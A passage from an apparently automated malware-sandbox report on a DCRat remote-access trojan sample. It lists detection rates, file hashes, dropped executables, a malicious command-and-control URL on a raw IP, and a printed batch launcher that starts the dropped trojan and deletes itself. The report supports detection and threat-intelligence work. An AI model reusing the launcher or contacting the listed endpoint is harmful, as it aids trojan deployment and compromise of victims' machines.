                          C:\Users\user\Desktop\jxryOjbr.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\lPgyvanJ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          C:\Users\user\Desktop\lyZggEuH.log | 21% | ReversingLabs | |
                          C:\Users\user\Desktop\mEXomrcz.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\noipVfbk.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\nxFpFSuh.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\olJxrfqf.log | 5% | ReversingLabs | |
                          C:\Users\user\Desktop\ougxbSJc.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                          C:\Users\user\Desktop\pxmXXnNx.log | 25% | ReversingLabs | |
                          C:\Users\user\Desktop\rAZFtXSs.log | 5% | ReversingLabs | |
                          C:\Users\user\Desktop\rkXniOKV.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\tgLOyLgZ.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\uHWOOpMo.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\vRqeFZrR.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          C:\Users\user\Desktop\wYpmLLZJ.log | 17% | ReversingLabs | |
                          C:\Users\user\Desktop\xsCeWCWh.log | 8% | ReversingLabs | |
                          C:\Users\user\Desktop\zuoNrmbc.log | 29% | ReversingLabs | |
                          C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php | 100% | Avira URL Cloud | malware |
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linu | 0% | Avira URL Cloud | safe |
                          http://121.127.37.30 | 0% | Avira URL Cloud | safe |
                          No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php | true | Avira URL Cloud: malware | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://121.127.37.30 | DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linu | DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | A5EbyKyjhV.exe, 00000000.00000002.1284740476.0000000004017000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                            121.127.37.30 | unknown | Afghanistan | | 55732 | RANATECHNET-AFRANATechnologiesKabulAF | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1569209
                            Start date and time:2024-12-05 16:01:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:A5EbyKyjhV.exe
                            renamed because original name is a hash value
                            Original Sample Name:48B90C11912E9C7147D86C55D1E2CC94.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/63@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: A5EbyKyjhV.exe
                            Time | Type | Description
                            10:02:21 | API Interceptor | 2407893x Sleep call for process: DZNTXHJCUWXUTqOrRrGotfqdMP.exe modified
                            No context
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RANATECHNET-AFRANATechnologiesKabulAFhttps://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            https://meandyouj.weebly.com/Get hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://en.softonic.comGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            https://solanadefimainnet.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://dreativityblocksnodes.pages.dev/Get hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            http://xb2.aggressiveq9.com/21u/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://nke.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://files.fm/u/vtrxvgdh6wGet hashmaliciousGuLoaderBrowse
                            • 121.127.42.98
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\Desktop\AlRNHzIf.logqNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                                based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                  RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                    main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                      file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          dvc2TBOZTh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            teh76E2k50.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (959), with no line terminators
                                                Category:dropped
                                                Size (bytes):959
                                                Entropy (8bit):5.907190190824914
                                                Encrypted:false
                                                SSDEEP:24:cwP09fnxfxKZaJOw4FtYXqkIuPwMC0co8PLio8aFzv:h0VnZxeJw4FtYXqkIr0co8Peo8u
                                                MD5:5CB1CA4329DD965B14561CF6FAEA8D96
                                                SHA1:2CEF12345560D2CE3C327D2CE1A1B931348A032D
                                                SHA-256:F99B0A30F5AA1AC3BD6479CE820517A8050503A8AE3F7BBD23FEFE5CFEB8D6C9
                                                SHA-512:DA9AF20902757ACE9EE4C52805AC73227F2F552A55E8BB61C0ABB1E6D2D8930761CD419F43B0129932EA1BF84E1703A1BC4936DF1B16E7B7974C1D52F30DB9A7
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (369), with no line terminators
                                                Category:dropped
                                                Size (bytes):369
                                                Entropy (8bit):5.820982261992436
                                                Encrypted:false
                                                SSDEEP:6:c+T11s25C9MVLftiwycN1/SLN6vLrri99cCJ4t3ik0H8DxSExKVypFBn:9TbDeMxYaSJKLrri9myHkNxDB
                                                MD5:28B02BFD6977004B570D7B92AF3BC8B6
                                                SHA1:A64951D5528068B4BE773F8F61815F1856608462
                                                SHA-256:A9948ED0ACE3BB0DAA5D006667823E5B4E35822974D5C6E2724CB31B28FDB052
                                                SHA-512:6D2637442E1E7F1969053D32983720101A2F924EEAB4D5D684A30A3F125DF4CC43D5A1C01F60E2E960125344BD9F7E798E4C66F7E976B7A1C62114CC74322FE2
                                                Malicious:false
                                                Preview:wbyWHqolUGsgdgIqIOYTQqJXI3VEwdz9lYcwGIozeW7xRWZyfooBolGFSaNNUjy0Rs4FDWj9jjz4tVFwdgjIyxU9RWeq4ae5hGgibUuIEobFwMW6Ubtx9pCdY5xr13FJF3WmzgUJwaDJVPMFAiVdqq61ECKggDRLjSA3ztGxGkBim2HJssrThlcY7eixWyntJ2jDOTPQbiXGpXPL4ByyV7n80l5VKTbR6SYuTE4Yca19NVtjPX2V9yXLOlMnY4FIGFJW9f20HaW5Fnuf2VGxaGSI5Mfr1Q9hUt2ILWktfCOjccGk0rvCySrAxBbwAK80aykWvmTfvWRY1tqdG41Kf6sBB2UJ5xtVDXIn1tzNXPRbBTIEV
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (356), with no line terminators
                                                Category:dropped
                                                Size (bytes):356
                                                Entropy (8bit):5.775149463646205
                                                Encrypted:false
                                                SSDEEP:6:gsaLuMJRpfmacOGu4QPhsVjCvC4q1mvUhcKZEw85RXHybvi0uuJf+72NM61rDBOm:iXUa98Cv79+mwCXHyu0RBgsV1XBOp+P
                                                MD5:941D7756AA0E9DC290F3616AEDB08C7B
                                                SHA1:F3B8F605FBEA22A1787E7B235149D5AFCDED2901
                                                SHA-256:E8F72C6C4BB467FCC62EBE661971312C3AD3241488A6657D3092CCC6A6E03BF2
                                                SHA-512:C12BD3B2EC6921DEF53C8ED5C371352AF43FBB5C6BFEC931E4756C02F59918F421827D7B0544639447B806C377C68A61EE118519190C23E1A569AFD6543BEE88
                                                Malicious:false
                                                Preview:KZdSOCo2YIPf7epDnb3li5w1UtUZEHFOSHn2VjdlGaNR5QvLlxFCHZxOnl8fsOxQDBN01xsE7SeHre6D7JxQCCG3TYOtl831n6O4D5UxFAFz4phIp4hjbgOA4Tgci9d9YnevPCACzALB6R8o1FDqbUaGsN9tY1PGhFbRLv3n4euaUMDnV2lc5wiEMYDCCQn7uFd10rcFMaw6k9vfJWYgQwKvhWEws0ln0wqPtMxnZfPfAldMmi2q1Hr84sTdnpXWzIGxTgw6ivGuhpv631KK74wtEsUA3UAtI3q1fp3Gv6HGA7bP7WjvfMY4WWslLvDOvWmn93bN8DYBxqsHRFDguPO5fvfI7R4A23Un
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (837), with no line terminators
                                                Category:dropped
                                                Size (bytes):837
                                                Entropy (8bit):5.885200984433089
                                                Encrypted:false
                                                SSDEEP:24:gWEQXe2gQYOjLNydAP4L0gxn6bw4vXgitGBWm:LpgQYOjLYAP4QIYw4P/7m
                                                MD5:68C50223E56C79A4B44A7826D73FFA00
                                                SHA1:802554A413210F4134773E1AB5DD6391014A81CB
                                                SHA-256:D0811668F2D8448F7F1A3823B82F628FE9FA013D96061AF0146A1E611E21AC41
                                                SHA-512:37A5066B7BF1876AD07A72DD73AC475BB37AF20AA4E61F62FE9DA90D6F70721F2B57DD6ECAB9F9A3530A591EACF334377E2CEAE95321470179A35C419E323F1B
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1698
                                                Entropy (8bit):5.367720686892084
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):4.243856189774724
                                                Encrypted:false
                                                SSDEEP:3:19MOrWhhL8q91n:3G8G1
                                                MD5:4E8F8F190E17E62387F973BE00412A47
                                                SHA1:936ABBA6D019F103BBCAC90631197D76CCA99856
                                                SHA-256:F3B51EDA29DAB13706296B5B241D3915C8862308ED973955060967A3F7A7DACE
                                                SHA-512:D28D668A6954F33DA278635AA49C6A68CB4568EA5054DE996F66E8905C3502CE0EE19865DF27DDD578D06F23AEAF8FA9D84DD412B4FD6371E1C4299DB899E802
                                                Malicious:false
                                                Preview:UeXiW8N3KLsAJBwdnUlAO3XQi
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201
                                                Entropy (8bit):5.450949129624606
                                                Encrypted:false
                                                SSDEEP:6:hCRLuVFOOr+DER5SMLDYnLsZKOZG1cNwi23fN3w:CuVEOCDEfSMoQYZ1g
                                                MD5:0496E721F6042AE22DDEE6D73F64F869
                                                SHA1:3346C92EFB19B296AEE0F92D2B3D85254B65E35A
                                                SHA-256:70FF5F0CFF0A6F51C291C4290D6A514AEA5905DA85CBDDD35EC656049A98B96F
                                                SHA-512:F6E5EDD827634B8E4CB8AD86730DF960CB53E0F4C02DEA7B480D444776037B3D99EF9C6900ACBC826F102B23B3E33C9177CF41F849AC62B7FAA0385A212D82A2
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\kAhb7GGyxn.bat"
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.679286635687991
                                                Encrypted:false
                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Joe Sandbox View:
                                                • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                                • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
                                                • Filename: based.exe, Detection: malicious, Browse
                                                • Filename: RustChecker.exe, Detection: malicious, Browse
                                                • Filename: main.exe, Detection: malicious, Browse
                                                • Filename: file_1443.exe, Detection: malicious, Browse
                                                • Filename: lsass.exe, Detection: malicious, Browse
                                                • Filename: dvc2TBOZTh.exe, Detection: malicious, Browse
                                                • Filename: teh76E2k50.exe, Detection: malicious, Browse
                                                • Filename: FuWRu2Mg82.exe, Detection: malicious, Browse
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33280
                                                Entropy (8bit):5.634433516692816
                                                Encrypted:false
                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):126976
                                                Entropy (8bit):6.057993947082715
                                                Encrypted:false
                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):50176
                                                Entropy (8bit):5.723168999026349
                                                Encrypted:false
                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.909536568846014
                                                Encrypted:false
                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
